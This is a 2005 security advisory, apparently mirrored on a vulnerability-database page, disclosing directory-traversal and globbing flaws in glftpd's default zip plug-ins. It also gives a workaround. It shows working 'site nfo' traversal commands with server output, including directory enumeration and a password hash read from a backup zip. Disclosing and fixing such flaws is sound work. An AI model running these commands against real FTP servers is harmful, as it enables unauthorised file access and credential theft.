Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

glftpd.txt

🗓️ 25 Feb 2005 00:00:00Reported by Paul CraigType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 60 Views

Multiple vulnerabilities in Glftpd plug-ins allow file access and information disclosure.

Code
` Pimp industries.  
"Its all about the Bling, B^!%@s and Fame!"  
  
Multiple vulnerabilities in Glftpd v1.26 - v2.00 default zip based plug-ins  
: sitenfo.sh, sitezipchk.sh, siteziplist.sh  
  
(C) Paul Craig - Pimp Industries 2005  
  
  
Background  
-------------  
glftpd is an open source ftp server used by the more 'hardcore' of ftp  
servers :) (www.glftpd.com)  
  
  
Exploit:  
-------------  
The exploit is not in glftpd itself, instead inside a suite of zip based  
plug-ins that come with the glftpd package by default, these plug-ins are  
widely used in installations of glftpd.  
This advisory will focus on the plugin sitenfo.sh, a script to allow users  
to read .nfo and .diz files from within zip archives("SITE NFO" by  
default). Although the exploits are synonymous with all the .sh scripts  
listed above.  
  
Due to improper input validation several flaws exist in the script that  
can allow for unprivileged access to files within the glftpd chroot and  
information disclosure of private files  
  
Firstly.  
Directory transversal to prove the existence of a valid file outside of  
the ftp siteroot:  
  
ftp> site nfo ../etc/grouap  
200- dn's NFO Lister v1.00  
200-  
200- That zipfile (../etc/grouap) does not exist!  
200 Error executing command.  
ftp> site nfo ../etc/group  
200- dn's NFO Lister v1.00  
200-  
200- nfo(s) from ../etc/group:  
200-  
200 Command Successful.  
  
Here we determine that the file ../etc/group exists, a file outside of the  
default FTP site root.  
  
Secondly.  
Directory transversal globbing attack:  
Due to improper parsing of *, a user can return the first two files in any  
directory ($1 $2), including files within 'private' or hidden directory's  
such as the 'staff' folder.  
  
ftp> site nfo ../../../../../etc/*  
200- dn's NFO Lister v1.00  
200-  
200- ../../../../../etc/group from ../../../../../etc/ftpd-dsa.pem:  
  
and to view inside private folders within the ftp root (that usually you  
are unable to see)  
  
ftp> site nfo staff/*  
200- dn's NFO Lister v1.00  
200-  
200- staff/Mark from staff/Peter:  
200- Command Successful.  
ftp> cd staff  
200- No such file or directory.  
  
Here we can see that staff/Mark and staff/Peter exist, although we are  
unable to even see the directory staff/ by default, since we have no  
access.  
  
This can be further exploited to build a full directory tree by using  
guided wildcards within the globbed request, such as.  
site nfo ../../../../../etc/a*  
site nfo ../../../../../etc/b*  
site nfo ../../../../../etc/c*  
  
And so on and so forth to list all valid files and directories.  
  
Finally you can use the script to also view any file inside any zipfile  
within the glftp root, such as backups or zipfiles in private directories.  
  
First, we find a zip file.  
  
ftp> site nfo ../../*.zip  
200- dn's NFO Lister v1.00  
200-  
200- nfo(s) from ../../backup.zip:  
  
backup.zip exists outside the glftpd site root and is returned in $1 to  
sitenfo.sh  
  
Now we will read all files within backup.zip that begin wtih 'p'  
ftp> site nfo ../../backup.zip p*  
200- dn's NFO Lister v1.00  
200-  
200- passwd from ../../backup.zip:  
200-  
glftpd:$c8aa2099$89be575337e36892c6d7f4181cad175d685162ad:0:0:0:/site:/bin/false  
  
This will of cause only work for zip compressed files, not gzip files.  
  
Combined, these flaws allow a user to browse the glftp chrooted  
environment and then read any file inside any zip file. Considering zip  
files may contain sensitive information such as backups or private  
documents, this exploit could easily lead to further privilege escalation.  
  
sitezipchk.sh and siteziplist.sh both contain similar exploits, although I  
have noticed sitenfo.sh is more frequently used in glftpd sites.  
  
Suggestions/Work Around:  
-------------  
  
Easy solution is to remove sitenfo.sh, siteziplist.sh and sitezipchk.sh  
from the /bin directory, passing user supplied arguments to shell is never  
bright and is not worth the security risk.  
  
  
Company status  
---------------  
Pimp Industries is a privately owned New Zealand based security research  
company.  
If you would like to contact Pimp Industries to discuss any nature of  
business, please email us at headpimp at pimp-industries.com.  
  
  
Personal Pimp Hello's fly to:  
-------------------  
The boys at security-assessment.com, pinky, sozni, and you! yes, you!  
  
Paul Craig  
Head Pimp, Security Researcher  
Pimp Industries  
"Move fast, think faster"  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Feb 2005 00:00Current
7.4High risk
Vulners AI Score7.4
glftpd vulnerabilitiesplugin exploitsfile accessinformation disclosureimproper input validationdirectory traversal.
60